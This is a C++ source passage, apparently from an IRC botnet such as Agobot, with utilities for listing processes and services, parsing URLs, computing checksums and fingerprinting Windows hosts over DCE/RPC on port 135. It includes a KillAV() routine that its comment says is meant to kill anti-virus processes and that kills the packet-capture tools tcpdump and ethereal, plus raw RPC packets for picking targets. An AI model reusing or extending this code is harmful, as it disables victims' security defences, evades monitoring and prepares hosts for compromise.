GetModuleFileNameExA( hProcess, hMod, szProcessName,sizeof(szProcessName) );
process_info pInfo;
pInfo.sProcessName.Assign(szProcessName);
pInfo.lProcessPid=aProcesses[i];
lProcesses->push_back(pInfo);
}
CloseHandle( hProcess );
}
}
return TRUE;
#else
CString sCmdBuf; sCmdBuf.Format("ps ax > tempfile");
system(sCmdBuf.CStr());
// FIXME: Parse "ps ax" output here
DeleteFile("tempfile");
return true;
#endif // WIN32
}
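/*
 * Returns true when szName is one of the stock Windows services that
 * ListServices() deliberately leaves out of its listing. Case-insensitive.
 */
static bool IsIgnoredService(const char *szName)
{
    // Standard Windows services the caller is not interested in.
    static const char *const szServicesToIgnore[] =
    {
        "Ati HotKey Poller", "AudioSrv", "Browser", "CryptSvc", "Dhcp", "dmserver",
        "Dnscache" , "ERSvc" , "Eventlog" , "EventSystem", "FastUserSwitchingCompatibility",
        "helpsvc", "lanmanserver", "lanmanworkstation" , "LmHosts" , "MDM", "Messenger",
        "Netman", "Nla", "PlugPlay", "PolicyAgent", "ProtectedStorage", "RasMan",
        "RpcSs" , "SamSs" , "Schedule" , "seclogon" , "SENS" , "ShellHWDetection",
        "Spooler" , "SSDPSRV" , "stisvc" , "TapiSrv" , "TermService", "TrkWks",
        "uploadmgr" , "upnphost" , "W32Time" , "WebClient", "winmgmt" , "WZCSVC",
        "wuauserv", "srservice", "Themes", NULL
    };
    if(!szName) return false;
    for(int a = 0; szServicesToIgnore[a] != NULL; a++)
        if(!stricmp(szServicesToIgnore[a], szName)) return true;
    return false;
}

/*
 * Enumerates the active Win32 services and appends one "[ServiceName] [ImagePath]"
 * string per service to *lServices (services in the ignore list are skipped).
 * The image path is read from HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath;
 * when the key or value cannot be read the entry is written as "[name] [????.exe]".
 *
 * Fixes over the previous version: the RegQueryValueEx size argument is reset
 * for every service (it is an in/out parameter, so a short value shrank the
 * limit for all later services), the registry value is NUL-terminated before
 * being formatted (REG_SZ data is not guaranteed to carry a terminator), every
 * opened registry key is closed, the enumeration buffer is freed, and a failed
 * malloc no longer dereferences NULL.
 *
 * Returns TRUE on success, FALSE when lServices is NULL, the service control
 * manager cannot be opened, the size probe fails for a reason other than
 * ERROR_MORE_DATA, or the enumeration buffer cannot be allocated.
 */
bool ListServices(std::list<CString> *lServices)
{
    if(!lServices) return FALSE;

    SC_HANDLE scm = OpenSCManager(NULL, NULL, GENERIC_READ);
    if(scm == NULL) { return FALSE; }

    // First call with an empty buffer: only reports the size required.
    ENUM_SERVICE_STATUS essProbe;
    DWORD nMemoryNeeded = 0, nNumberServices = 0, nResumeHandle = 0;
    if(!EnumServicesStatus(scm, SERVICE_WIN32, SERVICE_ACTIVE, &essProbe, 0,
                           &nMemoryNeeded, &nNumberServices, &nResumeHandle)
       && GetLastError() != ERROR_MORE_DATA)
    {
        CloseServiceHandle(scm);
        return FALSE;
    }
    if(nMemoryNeeded == 0)
    {
        // Nothing to enumerate.
        CloseServiceHandle(scm);
        return TRUE;
    }

    ENUM_SERVICE_STATUS *lpBuffer = (ENUM_SERVICE_STATUS *)malloc(nMemoryNeeded);
    if(!lpBuffer)
    {
        CloseServiceHandle(scm);
        return FALSE;
    }

    nResumeHandle = 0;
    if(!EnumServicesStatus(scm, SERVICE_WIN32, SERVICE_ACTIVE, lpBuffer, nMemoryNeeded,
                           &nMemoryNeeded, &nNumberServices, &nResumeHandle)
       && GetLastError() != ERROR_MORE_DATA)
    {
        // On ERROR_MORE_DATA the entries already returned are still valid;
        // on any other failure do not walk an undefined buffer.
        nNumberServices = 0;
    }

    for(DWORD i = 0; i < nNumberServices; i++)
    {
        const char *szName = lpBuffer[i].lpServiceName;
        if(IsIgnoredService(szName)) continue;

        CString sKeyPath;
        sKeyPath.Format("SYSTEM\\CurrentControlSet\\Services\\%s", szName);

        unsigned char szImagePath[1024];
        DWORD dwSize = sizeof(szImagePath) - 1;   // reset per service: in/out parameter
        bool bHavePath = false;
        HKEY hKey = NULL;
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, 0, KEY_READ, &hKey) == ERROR_SUCCESS)
        {
            if(RegQueryValueEx(hKey, "ImagePath", NULL, NULL, szImagePath, &dwSize) == ERROR_SUCCESS)
            {
                // dwSize <= sizeof(szImagePath)-1 on success, so this index is in bounds.
                szImagePath[dwSize] = 0;
                bHavePath = true;
            }
            RegCloseKey(hKey);
        }
        // NOTE: ImagePath is typically REG_EXPAND_SZ, so the string may still
        // contain unexpanded %SystemRoot%-style references.

        CString sEntry;
        if(bHavePath)
            sEntry.Format("[%s] [%s]", szName, szImagePath);
        else
            sEntry.Format("[%s] [????.exe]", szName);
        lServices->push_back(sEntry);
    }

    free(lpBuffer);
    CloseServiceHandle(scm);
    return TRUE;
}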
#endif // _WIN32
/*
This returns the filename of the currently running executable.
Win32: uses GetModuleFileName on the module handle returned by GetModuleHandle(NULL)
Linux: reads the /proc/<pid>/exe symbolic link, which points at the executable image
*/
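/*
 * Writes the path of the running executable into szFilename (capacity
 * sBufSize bytes, including the terminator) and returns szFilename.
 *
 * Returns NULL on failure: errno is EINVAL for a NULL buffer or zero size,
 * ERANGE when the path does not fit (the buffer contents are then
 * unspecified), and otherwise whatever readlink() set; on Win32 a zero
 * return from GetModuleFileName is reported as NULL with the reason left in
 * GetLastError().
 *
 * The Win32 branch previously ignored GetModuleFileName's return value and
 * handed back a possibly truncated, un-terminated buffer; it now detects
 * truncation (the API returns the buffer size in that case) and always
 * NUL-terminates.
 */
char* GetFilename(char* szFilename, size_t sBufSize)
{
    if(!szFilename || sBufSize == 0) { errno = EINVAL; return NULL; }
#ifdef WIN32
    DWORD dwLen = GetModuleFileName(GetModuleHandle(NULL), szFilename, (DWORD)sBufSize);
    if(dwLen == 0) return NULL;                        // failure; see GetLastError()
    if(dwLen >= sBufSize) { errno = ERANGE; return NULL; }   // truncated
    szFilename[dwLen] = 0;                             // not guaranteed by older Windows
    return szFilename;
#else
    char szLinkname[64];
    snprintf(szLinkname, sizeof(szLinkname), "/proc/%i/exe", (int)getpid());
    // readlink() does not NUL-terminate and returns the number of bytes placed
    // in the buffer; a result equal to sBufSize means the path was truncated.
    ssize_t iRet = readlink(szLinkname, szFilename, sBufSize);
    if(iRet == -1) return NULL;
    if((size_t)iRet >= sBufSize) { errno = ERANGE; return NULL; }
    szFilename[iRet] = 0;
    return szFilename;
#endif
}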
/*
This calculates the 16-bit one's-complement Internet checksum (as used by the IP,
TCP and UDP headers) over a buffer of bytes and returns it already inverted.
*/
#ifdef WIN32
#define USE_ASM
#endif // WIN32
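/*
 * One's-complement sum of `size` bytes at `buffer`, taken 16 bits at a time,
 * with the carries folded back in and the result inverted so it can be stored
 * straight into an IP/TCP/UDP header. A trailing odd byte is added as an
 * unsigned byte, exactly as the reference C implementation does.
 *
 * The USE_ASM inline-assembly variant has been removed: it started with
 * FEMMS, a 3DNow!-only instruction that raises #UD on Intel CPUs, and for
 * size == 0 it jumped straight into the byte loop and read one byte past the
 * buffer. The portable code below produces the same value for every valid
 * input and compiles on every target; USE_ASM is therefore no longer consulted.
 *
 * `buffer` must hold at least `size` bytes. Sizes <= 0 yield 0xFFFF (the
 * inverted empty sum) without touching memory.
 */
unsigned short checksum(unsigned short *buffer, int size)
{
    unsigned long cksum = 0;
    const unsigned short *p = buffer;
    int remaining = size;

    while(remaining > 1) { cksum += *p++; remaining -= 2; }
    // Exactly one byte left over (never for negative sizes).
    if(remaining == 1) cksum += *(const unsigned char *)p;

    // Fold the carries into the low 16 bits; the first fold can itself carry once more.
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (unsigned short)(~cksum);
}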
/*
This returns a reference to one static in_addr with s_addr set to lHost.
Every call overwrites the same object, so callers must copy the result
before calling again (and it is not safe to share between threads).
*/
/*
 * Stores lHost in a single function-static in_addr (no byte-order conversion
 * is applied) and returns a reference to it. Each call clobbers the previous
 * result, so the reference is only valid until the next call.
 */
in_addr &to_in_addr(unsigned long lHost)
{
    static in_addr s_addrSlot;
    s_addrSlot.s_addr = lHost;
    return s_addrSlot;
}
/*
This is meant to kill running anti-virus processes. On Win32 the choice of
which processes to terminate is delegated to KillProcess(NULL); on other
platforms it kills the packet-capture tools "tcpdump" and "ethereal".
Process list credited to F-Secure's Bugbear.B analysis @
http://www.f-secure.com/v-descs/bugbear_b.shtml
*/
/*
 * Terminates processes via KillProcess(). On Win32 a NULL name is passed,
 * so the selection logic lives in KillProcess itself; elsewhere the named
 * capture tools are killed in the listed order.
 */
void KillAV()
{
#ifdef WIN32
    KillProcess(NULL);
#else
    static const char *szTargets[] = { "tcpdump", "ethereal" };
    for(size_t i = 0; i < sizeof(szTargets) / sizeof(szTargets[0]); i++)
        KillProcess(szTargets[i]);
#endif
}
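/*
 * Returns the size in bytes of the stream fp, leaving its read/write
 * position where it was. Returns -1 when fp is NULL, when ftell/fseek fail
 * (e.g. a pipe or a stream in an error state), or when the size does not fit
 * in an int. The previous version ignored every ftell/fseek result and
 * silently truncated the long size on narrowing.
 */
int GetFileSize(FILE *fp)
{
    if(!fp) return -1;
    long lLastPos = ftell(fp);
    if(lLastPos == -1L) return -1;
    if(fseek(fp, 0, SEEK_END) != 0) return -1;
    long lFileSize = ftell(fp);
    // Restore the caller's position even if the size query itself failed.
    if(fseek(fp, lLastPos, SEEK_SET) != 0) return -1;
    // Reject an ftell error and any value that would be truncated by the int return type.
    if(lFileSize < 0 || (long)(int)lFileSize != lFileSize) return -1;
    return (int)lFileSize;
}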
/*
This splits a URL of the form proto://[user:password@]host[:port]/request into
its parts and stores them in *pURL. Only "http" and "ftp" are accepted; a missing
or zero port defaults to 80 or 21. Returns false on an unsupported protocol, an
empty host, or (when credentials are present) an empty user or password.
*/
// CString::Token/Find/Mid/Compare are project helpers whose exact semantics are
// not visible in this file; the NOTE(review) comments below flag the places
// where the result depends on them.
bool ParseURL(const char *szURL, url *pURL)
{ if(!szURL) return false; CString sURL; sURL.Assign(szURL);
// Protocol is everything before the first ':'. Compare() is used as "0 means equal",
// so anything other than "http" or "ftp" is rejected here.
pURL->sProto.Assign(sURL.Token(0, ":"));
if(pURL->sProto.Compare("http") && pURL->sProto.Compare("ftp")) return false;
// Token(1, "/") is expected to be the authority part ("user:pw@host:port"); that
// only holds if Token() skips the empty field between the two slashes of "://".
// NOTE(review): Find('@') is used as a boolean. If CString::Find returns -1 when
// the character is absent (the usual convention), every URL WITHOUT credentials
// takes the credential branch and then fails the empty-user check below —
// confirm Find()'s not-found return value.
if(sURL.Token(1, "/").Find('@')) {
// Host is the part after '@' and before an optional ':'.
pURL->sHost.Assign(sURL.Token(1, "/").Token(1, "@").Token(0, ":"));
if(!pURL->sHost.Compare("")) return false;
// atoi() of an empty or non-numeric port yields 0, which selects the scheme default.
pURL->iPort=atoi(sURL.Token(1, "/").Token(1, "@").Token(1, ":").CStr());
if(!pURL->iPort) {
if(!pURL->sProto.Compare("http")) pURL->iPort=80;
if(!pURL->sProto.Compare("ftp")) pURL->iPort=21;
}
// Credentials: "user:password" before the '@'. Both are required and are kept
// in clear text in the url struct.
pURL->sUser.Assign(sURL.Token(1, "/").Token(0, "@").Token(0, ":"));
if(!pURL->sUser.Compare("")) return false;
pURL->sPassword.Assign(sURL.Token(1, "/").Token(0, "@").Token(1, ":"));
if(!pURL->sPassword.Compare("")) return false;
} else {
// No credentials: the authority is just "host[:port]".
pURL->sHost.Assign(sURL.Token(1, "/").Token(0, ":"));
if(!pURL->sHost.Compare("")) return false;
// Same default-port rule as the credential branch.
pURL->iPort=atoi(sURL.Token(1, "/").Token(1, ":").CStr());
if(!pURL->iPort) {
if(!pURL->sProto.Compare("http")) pURL->iPort=80;
if(!pURL->sProto.Compare("ftp")) pURL->iPort=21;
}
}
// Request path: intended to be everything after the third '/' (i.e. after "proto://host").
// NOTE(review): each step re-slices from the first '/' Find() locates. If Find()
// returns the index of that '/' and Mid(pos) keeps it, the second and third calls
// are no-ops and sReq still begins with "//host"; verify against CString::Find/Mid.
CString sReq=sURL.Mid(sURL.Find("/")); sReq=sReq.Mid(sReq.Find("/")); sReq=sReq.Mid(sReq.Find("/"));
pURL->sReq.Assign("/"); pURL->sReq.Append(sReq);
return true; }
/*
This checks if pSearch is contained in pMem
*/
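/*
 * Returns true when the iSearchLen bytes at pSearch occur anywhere within the
 * iMemLen bytes at pMem (binary-safe: embedded NULs are compared like any
 * other byte). NULL pointers, negative lengths and a needle longer than the
 * haystack never match; an empty needle always matches.
 *
 * Fix: the previous loop ran while i < iMemLen-iSearchLen and therefore never
 * tested a needle that ends exactly at the end of pMem (e.g. "ef" in "abcdef").
 * Callers such as FpHost() use this to look for UUIDs anywhere in a reply, so
 * the last position must be examined too.
 */
bool MemContains(const char *pMem, const int iMemLen, const char *pSearch, const int iSearchLen)
{
    if(!pMem || !pSearch || iMemLen < 0 || iSearchLen < 0 || iSearchLen > iMemLen)
        return false;
    if(iSearchLen == 0) return true;

    // Last candidate start offset is iMemLen - iSearchLen, inclusive.
    const char *pLast = pMem + (iMemLen - iSearchLen);
    for(const char *p = pMem; p <= pLast; p++)
        if(memcmp(p, pSearch, (size_t)iSearchLen) == 0)
            return true;
    return false;
}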
// DCE/RPC "bind" PDU that FpHost() writes to TCP/135 first. Read from the bytes
// (DCE 1.1 RPC common header layout): version 5.0, ptype 0x0b (bind), flags 0x03
// (first+last fragment), data representation 0x10 (little-endian), frag_length
// 0x48 = 72 = the payload size of this array (FpHost sends sizeof()-1 to drop
// the implicit NUL), call_id 1, max xmit/recv 0x16d0, one presentation context.
// The two 16-byte GUIDs, in little-endian GUID order, are the abstract interface
// afa8bd80-7d8a-11c9-bef4-08002b102989 (version 1; the DCE management interface)
// and the transfer syntax 8a885d04-1ceb-11c9-9fe8-08002b104860 (version 2, NDR).
char rpcfp_bindstr[]=
"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
"\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89"
"\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
"\x2b\x10\x48\x60\x02\x00\x00\x00";
// Second PDU, sent once the bind is acknowledged: ptype 0x00 (request),
// frag_length 0x18 = 24 bytes, call_id 1, alloc_hint 0, context 0, opnum 0.
// The name suggests rpc__mgmt_inq_if_ids (opnum 0 of the interface bound above);
// FpHost() scans whatever comes back for the two signatures below.
char rpcfp_inqifids[]=
"\x05\x00\x00\x03\x10\x00\x00\x00\x18\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00";
// Raw 16-byte GUIDs searched for in the reply with MemContains() (FpHost()).
// In GUID string form: 975201b0-59ca-11d0-a8d5-00a0c90d8051. Which Windows
// version it indicates is only what the variable name claims (NT/2000).
char w2kuuid_sig[]=
"\xB0\x01\x52\x97\xCA\x59\xD0\x11\xA8\xD5\x00\xA0\xC9\x0D\x80\x51";
// 1d55b526-c137-46c5-ab79-638f2a68e869; treated by FpHost() as the XP marker.
char wxpuuid_sig[]=
"\x26\xB5\x55\x1D\x37\xC1\xC5\x46\xAB\x79\x63\x8F\x2A\x68\xE8\x69";
/*
 * Guesses the operating system of szHost using the method iFpType:
 *   FP_PORT5K - OS_WINXP if TCP/5000 is open, OS_UNKNOWN otherwise;
 *   FP_RPC    - binds to the RPC listener on TCP/135, sends the inq_if_ids
 *               request and looks for known interface UUIDs in the reply:
 *               w2kuuid_sig found -> OS_WINNT for short replies (< 300 bytes),
 *               OS_WIN2K otherwise; wxpuuid_sig found -> OS_WINXP;
 *   FP_TTL and anything else - not implemented, OS_UNKNOWN.
 * Every network failure, unexpected PDU type or unmatched reply yields
 * OS_UNKNOWN; the socket is always disconnected before returning.
 */
int FpHost(const char *szHost, int iFpType)
{
    if(iFpType == FP_PORT5K)
        return ScanPort(szHost, 5000) ? OS_WINXP : OS_UNKNOWN;
    if(iFpType != FP_RPC)
        return OS_UNKNOWN;

    int iOS = OS_UNKNOWN;
    int iRead = 0;
    char szRecvBuf[8192];
    CSocket sSocket;

    // Each step only runs if the previous one succeeded; the PDU type byte
    // (offset 2) is checked after every receive. NOTE(review): the first
    // Recv() result is not length-checked, so szRecvBuf[2] is whatever was
    // in the buffer if that call returned success with fewer than 3 bytes.
    bool bGotResponse =
           sSocket.Connect(szHost, 135)
        && sSocket.Write(rpcfp_bindstr, sizeof(rpcfp_bindstr)-1)
        && sSocket.Recv(szRecvBuf, sizeof(szRecvBuf))
        && szRecvBuf[2] == DCE_PKT_BINDACK
        && sSocket.Write(rpcfp_inqifids, sizeof(rpcfp_inqifids)-1)
        && sSocket.Recv(szRecvBuf, sizeof(szRecvBuf), &iRead)
        && szRecvBuf[2] == DCE_PKT_RESPONSE;

    if(bGotResponse)
    {
        if(MemContains(szRecvBuf, iRead, w2kuuid_sig, sizeof(w2kuuid_sig)-1))
            iOS = (iRead < 300) ? OS_WINNT : OS_WIN2K;
        else if(MemContains(szRecvBuf, iRead, wxpuuid_sig, sizeof(wxpuuid_sig)-1))
            iOS = OS_WINXP;
    }

    sSocket.Disconnect();
    return iOS;
}
/*
Blocked message:
554- (RTR:DU) The IP address you are using to connect to AOL is a dynamic
554- (residential) IP address. AOL will not accept future e-mail transactions
554- from th